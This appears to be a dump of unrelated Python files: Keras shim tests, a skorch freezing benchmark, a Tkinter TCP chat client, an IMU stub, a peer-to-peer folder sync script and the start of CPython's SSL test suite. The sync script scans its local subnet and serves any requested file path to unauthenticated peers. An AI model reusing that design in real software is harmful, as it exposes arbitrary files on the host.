def test_embedded_keras_model_in_module(self):
# Test the module shim when embedding a Keras model inside of it
# And assigning the model to an attribute
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
def test_training_arg(self):
# Test the shim when passing in a Keras `training` arg
class TrainingCheckLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
if training:
out = core_layers.dense(inputs, self.units, name="dense_training")
else:
out = core_layers.dense(inputs, self.units, name="dense_no_training")
return out
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)), training=True)
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_training/bias:0", "dense_training/kernel:0"})
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_no_training/bias:0", "dense_no_training/kernel:0"})
def test_incorrect_decoration(self):
# Raise an error if you incorrectly decorate a method
# that is not a method of a Module, layer, or model:
@variable_scope_shim.track_tf1_style_variables
def foo(x):
return x * 2
with self.assertRaisesRegex(ValueError, "does not extend"):
foo(tf.ones(shape=(4, 4)))
if __name__ == "__main__":
tf.test.main()
|
freezing.py
|
"""Benchmark to test runtime and memory performance of
different freezing approaches.
Test A is done by setting `requires_grad=False` manually
while filtering these parameters from the optimizer using
``skorch.helper.filtered_optimizer``.
Test B uses the ``Freezer`` via ``ParamMapper`` without
explicitly removing the parameters from the optimizer.
In theory there should be no difference in memory
consumption and runtime.
"""
from functools import partial
import resource
from multiprocessing import Process, Queue
import torch
import scripts.study_case.ID_12.skorch
import scripts.study_case.ID_12.skorch.helper
from scripts.study_case.ID_12.skorch.toy import make_classifier
import sklearn.datasets
import numpy as np
X, y = sklearn.datasets.make_classification(
n_samples=1000,
n_features=2,
n_informative=2,
n_redundant=0,
n_classes=2,
random_state=0)
X = X.astype('float32')
y = y.astype('int64')
N_LAYERS = 2
make_module_cls = partial(
make_classifier,
num_hidden=N_LAYERS,
input_units=2,
hidden_units=100,
output_units=2,
)
linear_idcs = list(range(0, (N_LAYERS+1)*3, 3))
np.random.seed(0)
torch.manual_seed(0)
def test_a():
# -- first by stripping parameters explicitly
np.random.seed(0)
torch.manual_seed(0)
print('1', end='')
mod = make_module_cls()()
# freeze all params but last layer
for i in linear_idcs[:-1]:
skorch.utils.freeze_parameter(mod.sequential[i].weight)
skorch.utils.freeze_parameter(mod.sequential[i].bias)
opt = skorch.helper.filtered_optimizer(
torch.optim.SGD,
skorch.helper.filter_requires_grad)
net = skorch.NeuralNetClassifier(
mod,
verbose=0,
optimizer=opt,
warm_start=True)
for i in linear_idcs[:-1]:
assert not mod.sequential[i].weight.requires_grad
net.fit(X, y)
for i in linear_idcs[:-1]:
assert not mod.sequential[i].weight.requires_grad
assert not net.module_.sequential[i].weight.requires_grad
rss = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
return rss, net.history[-1, 'valid_loss'], np.mean(net.history[:, 'dur'])
def test_b():
# -- second by simply freezing them
np.random.seed(0)
torch.manual_seed(0)
print('2', end='')
mod = make_module_cls()()
opt = torch.optim.SGD
cb = skorch.callbacks.Freezer(
['sequential.{}.weight'.format(i) for i in linear_idcs[:-1]] +
['sequential.{}.bias'.format(i) for i in linear_idcs[:-1]]
)
net = skorch.NeuralNetClassifier(
mod,
verbose=0,
optimizer=opt,
callbacks=[cb])
net.fit(X, y)
for i in linear_idcs[:-1]:
assert not mod.sequential[i].weight.requires_grad
assert not net.module_.sequential[i].weight.requires_grad
rss = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
return rss, net.history[-1, 'valid_loss'], np.mean(net.history[:, 'dur'])
def test_runner(q, fn, n_runs):
q.put(np.mean([fn() for _ in range(n_runs)], axis=0))
def test_forker(test_fn, n_runs):
q = Queue()
p = Process(target=test_runner, args=(q, test_fn, n_runs))
p.start()
res = q.get()
p.join()
return res
if __name__ == '__main__':
n_runs = 10
print(f'running tests for {n_runs} runs each.')
# We fork the tests so that each has its own process and thus its
# own memory allocation. Therefore tests don't influence each other.
dur_a = test_forker(test_a, n_runs)
print()
dur_b = test_forker(test_b, n_runs)
print()
print(f'test_a: µ_rss = {dur_a[0]}, µ_valid_loss = {dur_a[1]}, µ_dur={dur_a[2]}')
print(f'test_a: µ_rss = {dur_b[0]}, µ_valid_loss = {dur_b[1]}, µ_dur={dur_b[2]}')
# valid losses must be identical
assert np.allclose(dur_a[1], dur_b[1])
# memory usage should be nearly identical (within 4MiB)
assert np.allclose(dur_a[0], dur_b[0], atol=4*1024**2)
# duration should be nearly identical
assert np.allclose(dur_a[2], dur_b[2], atol=0.5)
|
TCPclient.py
|
from socket import *
import tkinter as tk
import tkinter.scrolledtext as tst
import time
import tkinter.messagebox
import threading
#定义输入服务器ip地址的类
class inputIPdialog(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self,master)
self.ipInput=tk.Text(self,width=30,height=5)
self.ipInput.grid(row=0,column=0,columnspan=3)
self.okbtn=tk.Button(self,text='确定',command=self.setIP).grid(row=1,column=3)
self.grid()
def setIP(self):
#这个global变量作为类变量的话没有效果,原因不知
global servername
servername=self.ipInput.get('1.0','end-1c')
#销毁窗口
ipRootFrame.destroy()
class Application(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self,master)
self.grid()
self.createWidgets()
def createWidgets(self):
#显示聊天窗口
self.textEdit=tst.ScrolledText(self,width=50,height=15)
self.textEdit.grid(row=0,column=0,rowspan=1,columnspan=4)
self.textEdit.config(state='disabled')
#定义标签,改变字体颜色
self.textEdit.tag_config('server',foreground='red')
self.textEdit.tag_config('guest',foreground='blue')
#编辑窗口
self.inputText=tk.Text(self,width=40,height=5)
self.inputText.grid(row=1,column=0,columnspan=1)
#定义快捷键,按下回车即可发送消息
self.inputText.bind("<KeyPress-Return>",self.textSendReturn)
#发送按钮
self.btnSend=tk.Button(self,text='send',command=self.textSend)
self.btnSend.grid(row=1,column=3)
#开启一个线程用于接收消息并显示在聊天窗口
t=threading.Thread(target=self.getInfo)
t.start()
def textSend(self):
#获取Text的所有内容
#https://stackoverflow.com/questions/14824163/how-to-get-the-input-from-the-tkinter-text-box-widget
str=self.inputText.get('1.0','end-1c')
if str!="" and str!=None:
#显示发送时间和发送消息
timemsg='客户端'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())+'\n'
#通过设置state属性设置textEdit可编辑
self.textEdit.config(state='normal')
self.textEdit.insert(tk.INSERT,timemsg,'guest')
self.textEdit.insert(tk.INSERT,str+'\n')
#将滚动条拉到最后显示最新消息
self.textEdit.see(tk.END)
#通过设置state属性设置textEdit不可编辑
self.textEdit.config(state='disabled')
self.inputText.delete(0.0,tk.END) #删除输入框的内容
#发送数据到服务端
sendMessage=bytes(str,encoding='utf8')
#发送输入的数据,与UDP有点不同,使用的是send方法,不需要指定服务器和端口,因为已经建立了一条tcp连接
clientSocket.send(sendMessage)
else:
tk.messagebox.showinfo('警告',"不能发送空白信息!")
def getInfo(self):
global clientSocket
while True:
#接收数据,1024指定缓存长度,使用的是recv方法
recMessage=clientSocket.recv(1024).decode("utf8")+'\n'
#接受时间和接收的数据
recTime='服务端'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())+'\n'
self.textEdit.config(state='normal')
#server作为标签,改变字体颜色
self.textEdit.insert(tk.END,recTime,'server')
self.textEdit.insert(tk.END,recMessage)
#将滚动条拉到最后显示最新消息
self.textEdit.see(tk.END)
self.textEdit.config(state='disabled')
def textSendReturn(self,event):
if event.keysym=="Return":
self.textSend()
#指定服务器地址,端口
servername=''
serverport=12000
ipRootFrame=tk.Tk()
ipRootFrame.title('输入服务器ip')
ipDialog=inputIPdialog(ipRootFrame)
ipDialog.mainloop()
#socket第一个参数指定使用IPV4协议,第二个参数指定这是一个TCP套接字
clientSocket=None
try:
clientSocket=socket(AF_INET,SOCK_STREAM)
except:
tk.messagebox.showinfo('未知错误','检查服务器地址是否错误!')
#tcp连接需要先经过握手建立连接
clientSocket.connect((servername,serverport))
root=tk.Tk()
root.title('SCP INNER CONNECTION KIT')
app=Application(master=root)
app.mainloop()
|
IMU.py
|
from threading import Thread
import time
class IMU:
def __init__(self):
print("you have created an IMU object")
self.angle = 0.0
def startListrening(self, frequency):
self.frequency = frequency
Thread(target=self.__updateIMU__, args=()).start()
def __updateIMU__(self):
while True:
print("updates IMU every cycle")
self.angle = 10.0
time.sleep(1/self.frequency)
def getAngle(self):
return self.angle
|
sync-node.py
|
# -*- coding: utf-8 -*-
import socket
import json
from pathlib import Path
from enum import Enum
from time import time
from threading import Thread
from subprocess import check_output
# PATH TO WORK
MYPATH = '.'
# Constants
INTERFACE = socket.AF_INET # interface type
TRANSPORT = socket.SOCK_STREAM # transport type: aka TCP
timesold = lambda path: path.stat().st_mtime
newest = lambda t1, t2: t1 if t1 < t2 else t2
class Status(Enum):
ADD_FILE = '1'
CHANGE = '2'
DELETE = '3'
ADD_PATH = '4'
class Command:
HELLO = b'1'
PUBLICATION = b'2'
GET = b'3'
size = 1
DEBUG = True
def mdebug(*objects, sep=' ', end='\n'):
if DEBUG:
for o in objects:
print(o, end=sep)
print(end=end)
class SyncNode:
port_listen = 65432
external_reports = []
def __init__(self, directory):
self.directory = Path(directory) # root directory to sync
self.main_map = {} # TODO init loading from file
self.friends = [] # list of IPs
self.internal_reports = []
self.myip = None
self.search_friend()
self.thread_listen = Thread(target=SyncNode.listen_mode)
self.thread_listen.start()
def run(self):
self.check_external_updates()
self.check_my_updates()
self.publish_updates()
def check_external_updates(self):
while SyncNode.external_reports:
reports = SyncNode.external_reports.pop(0)
for r in reports.split('\n'):
path, t_old, status, friend_ip = r.split(' ')
if status == Status.ADD_PATH:
if path in self.main_map:
if newest(t_old, self.main_map[path]) == t_old:
if not Path(path).is_dir():
raise Exception('Falha na sincronização: Pasta com mesmo nome de arquivo. Pasta recebida é mais recente.')
else:
Path(path).mkdir()
elif status == Status.ADD_FILE:
if path in self.main_map:
if newest(t_old, self.main_map[path]) == t_old:
if Path(path).is_dir():
raise Exception('Falha na sincronização: Pasta com mesmo nome de arquivo. Arquivo recebida é mais recente.')
else:
self.get_file_from_friend(path, friend_ip)
elif status == Status.CHANGE:
pass # TODO
elif status == Status.DELETE:
pass # TODO
else:
raise Exception('Status desconhecido.')
def check_my_updates(self):
current_map = self.directory_tree_status(self.directory)
reports = ''
add_report = lambda path, t_old, status: '{} {} {} {}\n'.format(path, t_old, status, self.myip)
# Compare path added or changed
for path in current_map:
if path not in self.main_map:
status = Status.ADD_PATH if Path(path).is_dir() else Status.ADD_FILE
reports += add_report(path, current_map[path], status)
elif current_map[path] > self.main_map[path]:
reports += add_report(path, current_map[path], Status.CHANGE)
# Compare path deleted
for path in self.main_map:
if path not in current_map:
reports += add_report(path, self.main_map[path], Status.DELETE)
self.internal_reports.append(reports)
return reports
def publish_updates(self):
while self.internal_reports:
report = self.internal_reports.pop(0)
for friend_ip in self.friends:
friend = socket.socket(INTERFACE, TRANSPORT)
try:
friend.connect((friend_ip, SyncNode.port_listen))
msg = Command.PUBLICATION + report.encode()
friend.sendall(msg)
except Exception as e:
pass
def get_file_from_friend(self, path, friend_ip):
friend = socket.socket(INTERFACE, TRANSPORT)
try:
friend.connect((friend_ip, SyncNode.port_listen))
msg = Command.GET + path.encode()
friend.sendall(msg)
tmp = friend.recv(1024)
data = tmp
while tmp:
data += tmp
tmp = friend.recv(1024)
# Ensure existing directory
path_split = Path(path).as_posix().split('/')
with Path('/'.join(path_split[:-1])) as d:
if not d.exists():
d.mkdir()
with open(path, 'w') as f:
f.write(data.decode())
except Exception as e:
pass
#@staticmethod
def directory_tree_status(self, dirname, traversed = [], results = {}):
traversed.append( dirname )
if dirname.is_dir():
for path in dirname.iterdir():
results[path.name] = timesold(path)
if path not in traversed:
self.directory_tree_status(path, traversed, results)
return results
def search_friend(self):
ip = check_output(['hostname', '--all-ip-addresses'])
self.myip = ip = ip.split()[0].decode()
mdebug('My ip:', ip)
ip_parts = ip.split('.')
base_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.'
for i in range(1,255):
target_ip = base_ip + str(i)
if target_ip == ip or target_ip in self.friends:
continue
friend = socket.socket(INTERFACE, TRANSPORT)
try:
friend.connect((target_ip, SyncNode.port_listen))
friend.sendall(Command.HELLO)
response = friend.recv(1024)
mdebug(' Response:', response)
if response == Command.HELLO:
self.friends.append(target_ip)
mdebug('New friend:', target_ip)
except Exception as e:
pass
friend.close()
@staticmethod
def listen_mode():
mdebug('Init server')
s = socket.socket(INTERFACE, TRANSPORT)
s.bind(('', SyncNode.port_listen))
s.listen(10) # number of conexions in queue
conn, addr = s.accept()
mdebug('Connected by', addr)
while 1:
data = conn.recv(Command.size)
if not data: break
if data == Command.HELLO:
conn.send(Command.HELLO)
elif data == Command.PUBLICATION:
SyncNode.receiver_publication(conn)
elif data == Command.GET:
tmp = conn.recv(1024)
path = tmp
while tmp:
path += tmp
tmp = conn.recv(1024)
SyncNode.send_file_to_friend(conn, path)
conn.close()
@staticmethod
def receiver_publication(conn):
report = ''
tmp = conn.recv(1024)
while tmp:
report += str(tmp)
tmp = conn.recv(1024)
SyncNode.external_reports.append(report)
@staticmethod
def send_file_to_friend(conn, path):
file = Path(path)
if not file.exists():
# raise Exception('Erro: arquivo solicitado não existe.' + path)
mdebug('Erro: arquivo solicitado não existe: ' + path)
elif file.is_dir():
mdebug('Erro: caminho solicitado é um diretório e não um arquivo: ' + path)
else:
with file.open() as f:
data = f.read()
f.close()
conn.sendall(data)
if __name__ == '__main__':
# teste: encontrar "friends"
n2 = SyncNode(Path(MYPATH))
process = Thread(target=SyncNode.listen_mode)
process.start()
n2.search_friend()
process.join()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
asyncore = warnings_helper.import_deprecated('asyncore')
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any references of "ubuntu" implies Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
support.check_disallow_instantiation(self, _ssl.Certificate)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(repr(proto), '<_SSLMethod.PROTOCOL_TLS_CLIENT: %r>' % proto.value)
self.assertEqual(str(proto), str(proto.value))
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
